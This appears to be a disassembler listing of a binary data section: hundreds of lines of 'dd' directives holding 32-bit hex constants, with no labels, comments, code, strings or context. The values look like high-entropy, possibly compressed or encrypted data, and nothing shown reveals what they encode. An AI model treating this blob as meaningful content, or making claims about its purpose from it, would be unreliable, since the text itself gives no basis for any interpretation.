dd 0B799BF93h, 69FFFFD8h, 0A3F83230h, 7E6F057Dh, 0FC057F18h
dd 0D64BA88Ah, 3F2F03A2h, 0FFB5F707h, 65B36F78h, 159E81FEh
dd 0FFEF2CC0h, 52B8B0BFh, 95B1A925h, 1DDA9CBFh, 7F1234BFh
dd 3F838833h, 7C9F5576h, 269E9F0h, 0E9F47F21h, 0BFA3516Bh
dd 0A5927B71h, 1806BF9Ah, 0D2D1FFDEh, 0ABF0D8Bh, 0F8BF0DC9h
dd 5FC49540h, 4A3FBE74h, 1B95AB5Ch, 65E1A478h, 193F6AD5h
dd 38A8FB1Fh, 515B7F05h, 0FF3F6B53h, 47A3927Fh, 0C1AE4400h
dd 0BFDFB804h, 0D4AB3A2Eh, 3FA0A491h, 39FF1B67h, 3F1239D7h
dd 8D767E54h, 0B0DBFF42h, 0A5D87FFDh, 1F81822h, 0A87E0573h
dd 14A3B437h, 0F57778FFh, 0E457C96Ah, 0BF10832Bh, 7AB144BFh
dd 2B0070Ch, 7BA6A9BFh, 7F4F9B69h, 3118787Fh, 73C3605Bh
dd 0F7703FFFh, 237FB98Bh, 0D5D6F8C9h, 993F97A7h, 6411B8Eh
dd 5D337F02h, 38F73EA5h, 0FF4FBD4Ah, 0FF04C57Dh, 3F63052Ah
dd 0A0DCF052h, 0FF6FADFFh, 486E5A88h, 1722CE3Fh, 7AC44FFh
dd 0CC0A7A7Fh, 3F1101F3h, 3263ABFFh, 0B820FFC5h, 0BF1AA410h
dd 3FFE6360h, 1C068C38h, 0F0BF5B7Fh, 0B1BF6C89h, 7FBD913Dh
dd 0CB8AFE4Dh, 0FC3CBF3Fh, 8CBF63DEh, 0BFDF223h, 36C4D792h
dd 5A3FB967h, 113218C6h, 0D39DFF3Fh, 0BBDE2721h, 0BF185950h
dd 0B13FDDD3h, 0BFF8A47Fh, 0CE3CBA99h, 0A53F6321h, 0DA9990FFh
dd 0B7545505h, 0BFEBB1C2h, 0D8DF300Bh, 0D6BFFD2Ah, 0F20CFF4Eh
dd 11BBF5BCh, 12637F37h, 43BF4D5Bh, 0DD7F6E8Eh, 0EC3EED44h
dd 0F6A405F0h, 16FF8F61h, 78E095F9h, 0B65C9E67h, 0BF3E2182h
dd 3FBEF8C7h, 15FF37ACh, 494FE24h, 2988238Ch, 4E3F1716h
dd 0E9F302EAh, 19BF4D78h, 0F7C3FFB8h, 7F047D01h, 7F1E0C89h
dd 50420F1h, 0FF12029Eh, 0B7DF54FFh, 29857239h, 0BE2A27FDh
dd 2F000598h, 0CC11E7Fh, 4EFABF63h, 3DBFC67Fh, 3F4B3F13h
dd 0D4E3D162h, 77AB7FD1h, 25BB0380h, 6271D7A1h, 7D3FC796h
dd 0F96EE9FAh, 291A3F4Ah, 3F173F31h, 0FF18FF2Fh, 0FF9E92C0h
dd 7FC6A6A1h, 993F0C91h, 33FFD2ADh, 737F818Dh, 2779938Fh
dd 7F61A989h, 8291A54Fh, 0A8B1DA39h, 12A39F3Fh, 0FEBF166Ch
dd 99439A6Ah, 0BFB7A527h, 0F1B7FAC0h, 84027EBDh, 737EFFEAh
dd 6625FAC4h, 0B5897F11h, 109E1FFFh, 0C3C2ABE5h, 0A8FD3F3Dh
dd 0CD1FCB99h, 0B18EC85Bh, 689FFF77h, 31E104E4h, 0A3FF6036h
dd 291ABF43h, 7A5AFF4Ch, 7FA9FFC6h, 970E1789h, 0A0886F6h
dd 563F3FF0h, 5CD3FC9h, 0F29E80FFh, 11A1DA42h, 7F7F4302h
dd 68C93Dh, 0E20620B5h, 0D8926E80h, 3F11024Fh, 3834D6FFh
dd 2BC4A512h, 0F4BF06B6h, 2F0FFBF2h, 168A46BFh, 78BA18F0h
dd 103F63EAh, 0FF55C624h, 0CA7EBF63h, 8302E154h, 4EF8FF07h
dd 0A40386AAh, 172200EAh, 81EF92BFh, 366B7F75h, 0C6BF58C8h
dd 3783F7Fh, 3BFF4655h, 0C62CBF3Fh, 2F33FF52h, 0E754D0FDh
dd 0FF092C02h, 0BFCA1AE9h, 8C8B779h, 8C4F8F70h, 3FE3593Fh
dd 31260719h, 9793FFDh, 23255E2Ch, 0E27FBBFh, 0EF89A0E3h
dd 550B60BFh, 3700705Dh, 18F4743Fh, 1277CF3Fh, 3F4ED6DBh
dd 0DBCEFE24h, 0AAE90ABFh, 352A5FDBh, 0DF8160B3h, 307FD63Fh
dd 6DBF63C7h, 14903BFDh, 0D11EA067h, 0BFE8DA7Fh, 9A723FFAh
dd 3FB186FFh, 0B2627CF4h, 98BC45A5h, 4F7B9CF2h, 90D65D7Fh
dd 0DBFFBFA9h, 0BF4A9041h, 0AA90273h, 96D8B53Fh, 0C2897F8Fh
dd 0F2C5D167h, 0F8B1FF8Ch, 0BF5FD58Fh, 65436803h, 15558EF8h
dd 0FF5F2A62h, 42FD9388h, 6FE3F56h, 601F380Dh, 8E3FCF4Bh
dd 7BBFC46Ah, 0F53FFFE1h, 7F36DAB8h, 0BF1A0844h, 4C0460Ch
dd 622DF8FFh, 97F5E75h, 0BFC615E6h, 9FC27E8Fh, 6F47D4DBh
dd 0FB095146h, 3BE5BF6Eh, 24F4FF2Dh, 0DF4442D8h, 554A63BFh
dd 1EDBE404h, 91A13FB1h, 0FFFE87C7h, 397AFFCh, 0B01A6F6h
dd 268539BFh, 9F5DFDBFh, 34179A2Bh, 0AC757FBFh, 56E43D50h
dd 0CEAB3D7Fh, 66FF0D26h, 1AB4FF16h, 0A3B37F63h, 9D6BDE45h
dd 6858187Fh, 7FC6FE40h, 0F07FB1F7h, 280DA857h, 0E17ABF23h
dd 7FA579D0h, 7FC7C11Ah, 0D2B03308h, 0FCBFD6BFh, 2C77DA83h
dd 0FE7F2303h, 0A701C33Fh, 98AF24EAh, 7FA47F4Eh, 2159442h
dd 0D29B6BC0h, 65F0727Fh, 0BF236CB8h, 8506F0DDh, 3FBA9A39h
dd 0BF1D4AA2h, 460A3F63h, 49824C3Fh, 753EF3BFh, 2CBF37D5h
dd 0BCBF1B5Fh, 783F2E2h, 0C2DB7FDFh, 0CCD7ECDEh, 2E51BF4Bh
dd 0BF447FB5h, 5D818F23h, 8DB7718Bh, 0C9867B7Fh, 97C22877h
dd 3FA313FFh, 0C2CDD8A8h, 3F7FE782h, 603F36C3h, 0ECE2353h
dd 0CABFDCBFh, 0CDFF0315h, 94F1C442h, 6F9795EEh, 461604BFh
dd 67BFFEACh, 54DAF89Eh, 0C6746CC5h, 1B70547Fh, 9ED1107Fh
dd 0F63F8CA8h, 0B73F46EAh, 8844FE7Fh, 7FF7B72Bh, 7BC604F6h
dd 0CFEA41BFh, 0D6FFDD2Bh, 0C8BF58D0h, 0BDC530D7h, 0A3461A3Fh
dd 636CBF4Dh, 0FF08CC7Fh, 3FDB18FAh, 9FBFB1CEh, 0E2F1111Ch
dd 686CA845h, 0BF0CA33Fh, 0A7E7B07Fh, 806B74B9h, 9A7F79EAh
dd 6EE8BF92h, 83BFDE35h, 7FBCF9E1h, 8D903F0Dh, 0C1FFBFFFh
dd 77A1D84Eh, 86A4215h, 0F1DCC03Fh, 0C035737Fh, 9B7F2F88h
dd 0C80154DCh, 68CF0D3Fh, 76FF5FE3h, 0C3BF1889h, 567FB135h
dd 3F1BBFF5h, 0EC0DD070h, 97EFFBFh, 39DA65F7h, 7468FF04h
dd 549FBFC9h, 0C4E16D73h
dd 0E43F8255h, 0B7076715h, 5A3F0EB4h, 82D6AAFEh, 5B42F49Eh
dd 0AFAAFFC6h, 46BF57FFh, 0D3333FABh, 1EC1BFA5h, 1D6EB88Bh
dd 217FED1Eh, 1B7FB88Bh, 0F83F27A1h, 0FFED903Ah, 757F3738h
dd 3EBF0D6Fh, 0A0D27F12h, 0D47F8D5Ch, 0FFBFF6A9h, 0C219A51Dh
dd 5F3582A9h, 0E92CA7Fh, 0AE0FFACh, 0C790477h, 0EFA5BC6Ah
dd 0D435FF3Fh, 5875CE8Eh, 0DDF0B5CFh, 0B6AD4AD3h, 0FD7F798Dh
dd 5E1FACECh, 86FF1BF8h, 0FF8DA5C6h, 628D15FFh, 0E5E04144h
dd 4F5BF63h, 0BC7BBF9Dh, 8D76163Fh, 1A117F2Eh, 0C4C1BB5Fh
dd 0BFB6BE2Ch, 5F7FD8E5h, 7F0BE895h, 7F9EF0EFh, 3F74E402h
dd 5B3F07D7h, 0E968FF58h, 0BF080297h, 0D141A4BFh, 0FED02AE0h
dd 46CAF82h, 64BF70B0h, 703FFFE3h, 3F249C60h, 0BFC603CEh
dd 16FF0960h, 62BF8CBFh, 1F7FF01Fh, 63FFEBFh, 1A9D18Eh
dd 0C3F9193Fh, 0DEAC44BFh, 4512CD7Fh, 0F6BF916Bh, 0BFBBD019h
dd 623F8B5Bh, 0F0FFC6ECh, 0BF433F8Fh, 28347F2Bh, 0C57F9741h
dd 0F02CE271h, 7F3FF6FAh, 7FAA47E3h, 2FC12219h, 0AB2D56FFh
dd 0FFE5E3C6h, 7ED39AE4h, 0CC0CDC20h, 763F1753h, 9E84F821h
dd 46C642F6h, 9E7C477Fh, 0EEFF2F36h, 4FE236A2h, 0FF46FD26h
dd 8ACE4F73h, 52357F02h, 0C069FF67h, 0FF8C6A58h, 0B3F1E0Fh
dd 1044FEBFh, 8E26F992h, 7FE5ADBFh, 53D8CFCh, 6E971479h
dd 251010BFh, 6B3F43FEh, 0A0FFBB14h, 0ECFFB1EFh, 0FF0E9D6Eh
dd 0FEBF1B61h, 501DABC3h, 5C3FBFBFh, 0BF41A36Eh, 2E529071h
dd 59D44BFh, 3E87E33Fh, 20183F46h, 3F187F86h, 7F7205C0h
dd 6ED0BF3Bh, 56D6A7EAh, 4294C9DEh, 0B0BFC647h, 4BC36F7Ch
dd 0DC1E8BFh, 0CEBF8CDBh, 0B431BF49h, 0FF9F3F38h, 7F16F7C2h
dd 4BFDD6F5h, 71A7F7Ch, 3668637Fh, 7FBF446Ch, 254A2AA0h
dd 0DDBF63A5h, 3AFF753Ah, 0E73F473Fh, 59FAEB90h, 2172FFFFh
dd 3AF130FCh, 0ACFF463Fh, 3898FF04h, 7F2E3F1Ch, 0BF1631E9h
dd 0D37597B7h, 856C492h, 7E7F7FA9h, 960C017Dh, 0E7FFAC20h
dd 25FF0700h, 0A8A2ED7Ch, 0CCFEFFA6h, 0AE0619F7h, 0FF0150B7h
dd 0C5DD96FEh, 7FA411C2h, 0A1C08764h, 7D7AFC7Fh, 3F7F449Ch
dd 6CA5D8C8h, 0C2A3F7A5h, 0F1FFD6CEh, 0BCA8EF5Fh, 0E691827Fh
dd 5C83F43h, 0BFA567E9h, 792B141Fh, 0FF7BF065h, 3F230191h
dd 28FF16F0h, 62A708DDh, 2D53BFFFh, 42455EAh, 38B9BFD0h
dd 837F68BFh, 0FFFBBFEBh, 25C4CEBFh, 535BC2B6h, 9D866BFFh
dd 5C11AA3Fh, 6FA1BA3Fh, 836575FFh, 6323132Fh, 0B2FFF300h
dd 0AD91FF31h, 23B2F1F0h, 6C3FBFB1h, 4BB8101Bh, 7E3FA9A4h
dd 75AE90A8h, 67BFAC50h, 484F856h, 0C6DADC28h, 6E70547Fh
dd 37C0383Fh, 0D229CFFh, 3F58A1FFh, 7F93D5C0h, 2AC43E22h
dd 6DFF3F25h, 9CCF55C8h, 8B82C1D8h, 6FA2BFA1h, 357DFF47h
dd 40730CFFh, 77CAC55h, 303F1221h, 5E7F0F38h, 383201FFh
dd 0BF85A280h, 0F964C4AAh, 2A0FFE6Eh, 0BC841F2Dh, 99F3647Fh
dd 0AC7FFECDh, 0B1ED3D5Ah, 7F2281FFh, 1BA3C13Ch, 63ABF13Fh
dd 0BF38A37Fh, 6F34BB1Fh, 9F059126h, 0FFABF6BEh, 0CB54E001h
dd 51478E6Ch, 189FF4EDh, 0DAAAC4FFh, 0FFD6BF8Ch, 9C810423h
dd 0FF3F18FDh, 78CFB7BFh, 0FCF52B55h, 1E06B1B6h, 7F2E6BEFh
dd 80EFF85Bh, 0A15F3310h, 0EE64EFF4h, 80BF8FA9h, 72C519B9h
dd 7FFFE37Dh, 3F4FA81Ah, 0FF183804h, 0BF308DC5h, 6310FF8Ch
dd 0E235E3Fh, 4E6317EBh, 0A5B17ABFh, 2CBF37F1h, 0FFF38136h
dd 7F9D041Ah, 0C0EE3F1Bh, 7F2C86F6h, 0DCBF6FDCh, 0BF6ED771h
dd 0FF0C56E0h, 0BA3439F5h, 0BE3BADFFh, 7DDFC5FFh, 0CCC081E0h
dd 0FFD49DD8h, 0BFE0CCD5h, 0B6A1FF9Bh, 0BF1BE8C0h, 53B2F9BFh
dd 0A9C1C83Fh, 0C73F8CF7h, 0EA144993h, 64FF6F3Fh, 0AF0C1ED7h
dd 7CF87FCFh, 91D5220Eh, 6DF5FF2Fh, 6F3F550Fh, 8311CE7Fh
dd 32337F02h, 4C74BF89h, 0A7F2390h, 0C279CEFFh, 7D95DB85h
dd 3057D556h, 2B77A7B8h, 0CDABFF33h, 6F05A23Eh, 42F1BF7Fh
dd 2D98DAAh, 355A62D0h, 0BF189D3Fh, 0FF215CCEh, 0ED6A1AFEh
dd 0BF230225h, 0C58414BEh, 0FFF1F7D6h, 447F0Dh, 0A004BFF5h
dd 27FF37A6h, 7FD3A164h, 0BF339B1Ah, 7FF27ED8h, 0B1FF94CFh
dd 8BFABFFAh, 1965DB28h, 5BEBBFFCh, 7C6DA32Eh, 0A37A3081h
dd 3F9BA34Ch, 0F5DBC2C8h, 0C04F3F01h, 7F2129E8h, 3FE066D0h
dd 0B2567F13h, 24A83FFFh, 0A8DCB952h, 9BFBC2E2h, 1199BFE8h
dd 0E05BFA3Fh, 5EB225AEh, 0AC29783Fh, 78E2BF17h, 7F3F60A4h
dd 27E57D55h, 0D60C31h, 9634BF3Ah, 0E305FF66h, 0BF6FCA82h
dd 0DCBB5226h, 9737CFCh, 12F7780Eh, 0D67A383Fh, 0B0717F2Ch
dd 0C3BF361Bh, 3FF17F2h, 3FD3A65Eh, 0D57FB811h, 0EEBF5F9Ch
dd 0F4C05E94h, 9D854551h, 0EA1ABF8Ch, 2344FF46h, 0CA5F1E7Fh
dd 0FE7F057Bh, 0C9F56BBFh, 37041D15h, 0F699D47Fh, 0FD25469Ah
dd 0FF8C347Fh, 0E90434BFh, 3F48F252h, 85A417FDh, 0BFB8979Bh
dd 3F97FDCCh, 0EA2EA06Fh, 7EBFA4E0h, 72E52BFCh, 673F84D9h
dd 0C9AFFF18h, 780581A7h, 0D0006502h, 0FF5CD7FFh, 99837F31h
dd 1818FE3Fh, 912178BCh, 9C399F3Fh, 3F01899Dh, 8489ACFFh
dd 0B2ACCA7h, 92FF5FBFh, 0ECF614B9h, 0FBD760A3h, 0C2080C1Ah
dd 57DC0F6h, 0DFABA5F2h, 4A1833Fh, 9982D758h, 0F572BF5Fh
dd 0F7428AA1h, 7262BF8Ch, 7F63FFF0h, 843F43D3h, 0F8A5673Fh
dd 0AFA1F6F6h, 57FB7C6h, 0B0E7C0C8h, 0E0F87F8Ch, 4B57FFFAh
dd 7FDE417Fh, 4F9C69B2h, 0C043FC6h, 0E14A99BFh, 0CE709728h
dd 0DEBF63D7h, 380CCD20h, 4EC9EB37h, 71C0F189h, 0BFB86842h
dd 7F5FC410h, 52200380h, 0C2DCB5E2h, 0FFDF7FE1h, 0D8398EF4h
dd 71D2C255h, 0C031E57Fh, 0D179ACD4h, 0FFBCF13Fh, 1253C68Bh
dd 0FF19087Fh, 1733FF63h, 0CE26FBBFh, 733F4DF4h, 29C3204Fh
dd 0FF36D6BFh, 0FF08111Ch, 16E0CAC9h, 0F83FB684h, 6E89BFB1h
dd 2DDFFEFFh, 0CD04F4Ah, 0CFA8627Fh, 0FA6EB73Fh, 224DEB6h
dd 0FA3FB1A4h, 4E39DB95h, 0EB7F5C6Fh, 0E7F5DB8h, 0E047BF1Bh
dd 1FF5C371h, 0B3314FFh, 0D8FCC63Fh, 52E3042Eh, 0C4BF2309h
dd 7F3AFF5Eh, 0FFFF2FE9h, 0AA583FCBh, 0EE9E7C79h, 0BFE442C6h
dd 0DE1B5EE2h, 2571CE7Fh, 0C43BFF97h, 5CD07F43h, 48523F74h
dd 7A6DC07Fh, 293F16BFh, 1B833F11h, 24AC1F3Fh, 0E204E5BAh
dd 0C77F5FBFh, 0E8C4778Dh, 4CCCC6DCh, 0C7F5E3Fh, 0B27D68FFh
dd 6B07F7Fh, 6B80B9B3h, 5C1539EAh, 8113FF6Fh, 778436D6h
dd 0F8C667BFh, 0C2A9D0FDh, 683FA4FDh, 12FF9B06h, 0A101FD5Fh
dd 9CDF6738h, 237F3F59h, 11A26BD7h, 0F48B7F0Bh, 6B4412D3h
dd 0D927F3Ch, 15FC897Fh, 3BCF5086h, 0CE3F084Eh, 89FFB10Fh
dd 0B8D43F29h, 0DF0FBCFFh, 1DBBF0B2h, 7FFE1BCCh, 0ABA20485h
dd 0DE197FC3h, 0AD3FB8C1h, 0F93F910Ah, 256A286Ch, 64318ADh
dd 0C13F12FFh, 0A0F3BD27h, 3F2FA969h, 0F4CDF72Dh, 0FB77E6Dh
dd 0F4BBBFB8h, 414DFF46h, 0B920F2FDh, 0BA8E3C78h, 9C5FB03Fh
dd 0CAB550FFh, 0D5A556FBh, 6A351650h, 0FD0D5A6h, 31B708D7h
dd 0C4DA0764h, 75634840h, 0C0B56A9h, 38F845CCh, 71AB1EF9h
dd 3DA3CEAAh, 1CBA1211h, 7158005Eh, 0B5248948h, 0E8104D09h
dd 67B40540h, 0AEC4FB0Fh, 7AE549C0h, 0FCA38F02h, 6C1161ACh
dd 54954667h, 0DA3CC39Eh, 0D5D32ED6h, 55763E23h, 0FA7BF877h
dd 15AE4BA3h, 78266380h, 71AD2014h, 3DA81634h, 44C682B4h
dd 58D4CC24h, 8C229716h
dd 535F9D95h, 0BDB38D00h, 0C218C48Eh, 233F0AEBh, 0C902A018h
dd 428BEA7Ah, 11A721E6h, 474FE912h, 60551EC1h, 1813D0B9h
dd 12533457h, 41080865h, 2BF5EF9Bh, 271505D2h, 3593A078h
dd 0B460F5C9h, 78845408h, 9D3BD4C9h, 0C3EE3091h, 2DEB8009h
dd 890663C2h, 39062280h, 0FA1289FBh, 8058F2F7h, 0E8718613h
dd 952831Ch, 0B3B6B93Fh, 0A7D0A9BAh, 0EEC60BBBh, 40BC4300h
dd 3FF407BCh, 6F5D2AD5h, 0BFB215A9h, 2A022141h, 92709481h
dd 7D250491h, 433D2BB4h, 3E37D7C7h, 0C7E5F03h, 7A19019Ah
dd 4AF6C13Bh, 224756D5h, 0A876FD8Ch, 0B9FB0A59h, 170019F5h
dd 12328826h, 0E909FA60h, 1347B005h, 9F6C9DF0h, 67D3D02Ch
dd 84160800h, 0A19098CFh, 551E1AD1h, 0FB8210F9h, 0D34AAEFCh
dd 0B7266405h, 8F4CCC1Ch, 0BF8A5196h, 316F8F30h, 37328A33h
dd 70C8D1B7h, 0D88DCE5Fh, 864047CFh, 8A0E26B1h, 0B775331Ah
dd 0CF6F031Ah, 0A0D81855h, 0E96A0A90h, 0F60163A1h, 0F0C19A31h
dd 0F00320F5h, 0F47052C0h, 1354CD32h, 409020E1h, 952B4B60h
dd 86D9C37h, 49EE704Ch, 0B71D8875h, 571326E3h, 0A81FE3B1h
dd 0DBE48CDBh, 1DC87B11h, 4012C012h, 18B76084h, 0BEB655DFh
dd 0C32D9C04h, 0D1363h, 2CC5D309h, 55D4924Dh, 0AB6A7519h
dd 262C75E1h, 7D99AE14h, 2A974C8Ah, 207C309Dh, 31632FCBh
dd 0BE0079h, 0AC006B9Ah, 61F0914Eh, 0ADC01024h, 17BAE400h
dd 80CD5823h, 1B53BEF1h, 8030EC96h, 9D1184E4h, 919FC6EDh
dd 87F1D3h, 92CC349h, 9AB4BE6Ch, 0F0A6408Bh, 6011E0B9h
dd 8C0D03Eh, 6CA908BDh, 5D302398h, 9E028C2Fh, 94C3739Eh
dd 3CA3E2EAh, 70038E3Bh, 959B067Ah, 322D3570h, 0D93B6183h
dd 61F6EC7Eh, 0D308725Ch, 7DF714C9h, 5205DB2Bh, 280E1AFDh
dd 7DC841BDh, 48082DE8h, 975C5C1Ah, 53303315h, 3363CB1Ah
dd 0AA890663h, 0FBD60623h, 0F7721B89h, 599758F3h, 18425B40h
dd 1434081Fh, 79ED5B18h, 0C8EC0B64h, 619F7841h, 8B051EBBh
dd 800725h, 4E1D4FB8h, 7DB3CDC3h, 0C500C31Ch, 0E477D263h
dd 0C120DB1Ch, 0D095E0C3h, 0D33D0D56h, 0BF16C08Dh, 0C92B1199h
dd 83E40575h, 2090B5C9h, 8475E074h, 0C9C136E4h, 30CD885Ch
dd 64FEC97Fh, 631B1FFh, 0CDA589AAh, 89970FFEh, 0F1F7EF09h
dd 0FFC958E6h, 5B4F5901h, 0FF6DCF9Ah, 0D17ECF7h, 10F0D2CAh
dd 646916FFh, 0B20C4C0Ch, 0D713FFFDh, 0AA02518h, 80FFA5FDh
dd 0F900C3ACh, 0FFC421E6h, 43E3D71Ah, 4CEEB2B0h, 4B642AFFh
dd 0B2F5D0D1h, 2C01C2BEh, 43E7FF0Ah, 0B304BE8Dh, 764A1BCAh
dd 750A5AFFh, 40702E72h, 7407EC9Dh, 92F23FB9h, 0B0E3E563h
dd 82F41FFBh, 7FC460B1h, 3E187B1Fh, 1D4604FFh, 3F23E2FFh
dd 0FAC07F4Dh, 0E8C106FFh, 0F8723B0Ch, 389CB691h, 963FDF8Ch
dd 0FF494C95h, 0F989E182h, 8EB3E82Bh, 7EA3D0FFh, 6591414Dh
dd 43B6C171h, 51166FBFh, 0FFC3FB10h, 4BF3D462h, 513FC8DAh
dd 0AD1606FFh, 229BC539h, 632AFF3Bh, 28119CE3h, 0DFFE85Dh
dd 83E1AE91h, 0B74B4CBDh, 21733F64h, 164F466Eh, 1DD87FDCh
dd 72D1DCB9h, 237BBC13h, 0F03CBF29h, 0AB9FBEE1h, 0B15FE1D7h
dd 0DB4117F5h, 6A3F9E2Fh, 4D7FBFB6h, 76784F5Fh, 7431B75Bh
dd 0B3FB3166h, 0C118443h, 0F4627FFFh, 861611F0h, 41F97F6Fh
dd 10C7FF9Bh, 0F518010Ch, 0DAFFE67Fh, 62ACE12Dh, 0FF0A1BA5h
dd 0D736E392h, 0CD09245h, 820C2EFFh, 0A81EB369h, 0ECFFB59Dh
dd 0E9C93F9Fh, 5954DB89h, 8E92B57Fh, 17C0637Dh, 2E761B23h
dd 3C62EEFBh, 0BEBF1151h, 0CB218DD0h, 893FCFFBh, 92A42F0Dh
dd 0FA5FF3Fh, 0F6FDA5C6h, 28FFEC2Eh, 79585A6Dh, 0FBFDCA4Fh
dd 678D44B9h, 917FFF64h, 0D2B4E8E7h, 809CF62Fh, 7F3F5F2Fh
dd 207B6D25h, 0E18E2E60h, 590BFFC6h, 0F9237F36h, 0B170235Fh
dd 0C107FAF6h, 54E53F92h, 32F0CB16h, 4484E895h, 0F87DDF8Ch
dd 0C2F64C54h, 0DBBF17FEh, 0FFB87FC0h, 0B0B017EDh, 1701FB44h
dd 0FC0A9FFFh, 0C1B82174h, 60D9FF4Bh, 11682E0h, 42BC52EEh
dd 167F2C3Fh, 3FB917B0h, 4A6FA7F9h, 5A89DBFFh, 0E7C659BFh
dd 0F6FF2AE1h, 0FA257FFFh, 82DA4BB3h, 29857B2Ah, 0D7EC38F8h
dd 3F479009h, 0C3E16EC2h, 7CBF84FCh, 0B5048C7Bh, 80FF1EB2h
dd 0B4F0F8C0h, 17F02BCAh, 0BFA2C389h, 0B38426FFh, 7F6CD3C9h
dd 0F0CCFC67h, 0C03F2EB2h, 4E9E5F2Fh, 5284C69Bh, 3DFC7DFFh
dd 7FBFB421h, 51A760DAh, 0FF16B708h, 0CED94D4h, 0FB3F9B2Dh
dd 0B3F02F7Eh, 591FBF62h, 0F06544A1h, 0A965B32Dh, 3F8DBF85h
dd 0C5A5E2FBh, 7FB1DD04h, 0C3B62492h, 0ACE12661h, 75BF3D61h
dd 0E6C365Dh, 0B77F61D4h, 271D7FFFh, 2DE99788h, 7B1AED25h
dd 17DB7F58h, 6FC1FF44h, 4D9E7E7Fh, 0FF9140C2h, 7F402AE3h
dd 6FE8BF37h, 0B04B58C3h, 63B9CD5Dh, 74303FB9h, 0E5557272h
dd 1AC2B150h, 3F617F6Ch, 0C6433F5Dh, 21FF87EAh, 0F07264FFh
dd 3FFC3BA8h, 6E32E7FDh, 0DCB2C53Fh, 34D1F57Fh, 7F7B1C3Fh
dd 0CE171F7Fh, 878520CCh, 0B846B63Fh, 0C97F3773h, 913F0BD8h
dd 0C417FE3Eh, 23BF6D7Fh, 8C523FBBh, 570C7171h, 0B7E03F87h
dd 52EDCD87h, 0A85E7F75h, 0DAF1503Fh, 6FFFBE7Fh, 8C43913Fh
dd 9CBF77BEh, 7C2A811Ah, 3FA0627Fh, 3A464BFh, 25FFBF19h
dd 0D8EEE03Dh, 8EF4C34Bh, 0ADF09980h, 3F0B713Fh, 0A45796CCh
dd 0FAFFC240h, 2DC94FFFh, 7858BF5Ch, 0BF1BFF22h, 7E8CA8D0h
dd 22ACBCBFh, 0D444FD84h, 0D42C1371h, 0BFC1B27Fh, 25841FFFh
dd 66ED44ABh, 0C93FE895h, 0C1E13CBEh, 0B00FFF11h, 0B6FBFB45h
dd 3F1F80D7h, 0BE961B70h, 15BCF17Fh, 0FB0D1790h, 0E5C7FC2Eh
dd 3E4017B4h, 25DCFF6Eh, 244CD85Dh, 0B465E13Fh, 0A1917006h
dd 321ABFBFh, 1975069Dh, 99597FBFh, 0B760217Bh, 0A226BFEAh
dd 0F62E7F0Bh, 0EC08D718h, 2DBFE93Fh, 6A101D7Fh, 12363FBFh
dd 6F82EB48h, 0B8259AFFh, 447FC8B7h, 0CD3F18B5h, 4BB127EEh
dd 0DC214ABFh, 875C7BFFh, 227B35F1h, 232C177Fh, 0B7FF1A75h
dd 0D00BE3Fh, 7F1B9B3Fh, 0FFCCA6B2h, 0F3F658Ch, 3FE3523Fh
dd 71FF15EDh, 31BAB945h, 7ADF8492h, 2B51C151h, 8B23DB80h
dd 83FE0300h, 10F06ECh, 0C02240Ch, 663E8231h, 8C005858h
dd 6ABE80FDh, 8C005930h, 649E88FFh, 8C00190Bh, 0F3E8220h
dd 0BCAAB289h, 7149014Ah, 68383F04h, 0F0850F0Eh, 3E62h
dd 15782405h, 26E980E3h, 0E49B83Ah, 96B272A2h, 0EC5903E1h
dd 4656EBE8h, 603B10A8h, 7FAA38Ah, 3A6500F7h, 0EA048782h
dd 4AE3E64h, 42F6903Fh, 8AE0370Eh, 0E3CE0869h, 0EE4FEEF4h
dd 511B0805h, 50F68B66h, 5C2D306h, 41C910C2h, 80054Fh
dd 0B658767Ch, 18C005C3h, 57F78514h, 29DA802Bh, 0F2F28F6h
dd 7FBE8BAh, 0CAFEFBF7h, 2911824h, 3B5FCA10h, 0D83B552Dh
dd 1130AE4Dh, 100370BBh, 0C5F287C1h, 89417E14h, 5B06B3F7h
dd 4BDC02E4h, 0FC8F0785h, 114A477Ch, 1B3E2B09h, 0DCBF53DBh
dd 40004204h, 228F0160h, 23DD02DDh, 0DAC186Ch, 70D51881h
dd 0D4169F68h, 0E63C228h, 0F0000997h, 44ABDCCDh, 0E970CB61h
dd 0F6D91024h, 5D49C238h, 748BC90Fh, 5BA7407Eh, 0FD820E13h
dd 893D478Ch, 8D63873Ch, 0ACDC9927h, 9F1E3CABh, 0AE89CB41h
dd 4CEBA134h, 2C6AEDE5h, 31353B06h, 0AB33D796h, 62857E61h
dd 0D79403F4h, 87AE029h, 527C1C49h, 0CD22002Ch, 0DF2C4A2h
dd 198430ADh, 3B6A9B82h
dd 5D889E38h, 21680FCAh, 58ACD4F8h, 3870363Ch, 428F6B1Ah
dd 0C296839Fh, 3FAA864h, 91ECAE3Ah, 1D5300D4h, 0C2270488h
dd 0F5440A3Ch, 53658727h, 3862A4ABh, 92412A8Bh, 0D2044780h
dd 0DFDB9B97h, 4EDBFE4Dh, 0A7272945h, 0EF8041D7h, 0B91199DFh
dd 0C105CEh, 0A73F8500h, 658C7633h, 16299E7Fh, 0C457122Ah
dd 80071842h, 24B68661h, 0D21120B4h, 988AB78Ch, 0C34B2A38h
dd 0A920FD58h, 875627A1h, 0C18BFEEDh, 0AD888215h, 0B47FD426h
dd 2C70CB58h, 64496193h, 9153D946h, 5FA25CE3h, 881508D5h
dd 0F1259904h, 920523E2h, 2926DCA6h, 0EF3B1830h, 0ACBA6723h
dd 0A83B8182h, 2ED381Ch, 8A5D801Bh, 88C016ACh, 18F22A3Ch
dd 9C0A089Fh, 20E5193Ch, 46DF442Ah, 0EC5E08B8h, 33567603h
dd 9A11B26Ch, 0D920961h, 1292E8F6h, 4D1C5936h, 0EB099377h
dd 6756D924h, 0C26D83EEh, 85EB5800h, 0D332F0B5h, 2E51C6D2h
dd 0DC5DA31Fh, 78366317h, 682AF805h, 8B967E24h, 2601BB4Ch
dd 1723F8B7h, 8604078h, 45904090h, 4EA0AF68h, 0BDDCC55h
dd 3B935CCh, 12709BBDh, 853D017Dh, 66A1F4F3h, 4B2112D8h
dd 49603D47h, 8E694849h, 271FBD2Dh, 4BD7E90h, 93369EF3h
dd 0D5124D74h, 1EB1024Fh, 66270774h, 0B237C98Bh, 5D6C096Ch
dd 7ACAF841h, 878843BCh, 88C11EE3h, 0B0920036h, 22C65911h
dd 78087963h, 91289856h, 4F8816BBh, 42858150h, 0EAA458C4h
dd 6F1F1244h, 0D0578CC0h, 0F2AAFFBh, 0FDE21C49h, 6DB7E378h
dd 305559Ch, 5676582Eh, 5AD854C0h, 0B008580Fh, 902F3D24h
dd 48E09087h, 3F607677h, 0A00D1238h, 204D749h, 3B8DA9Fh
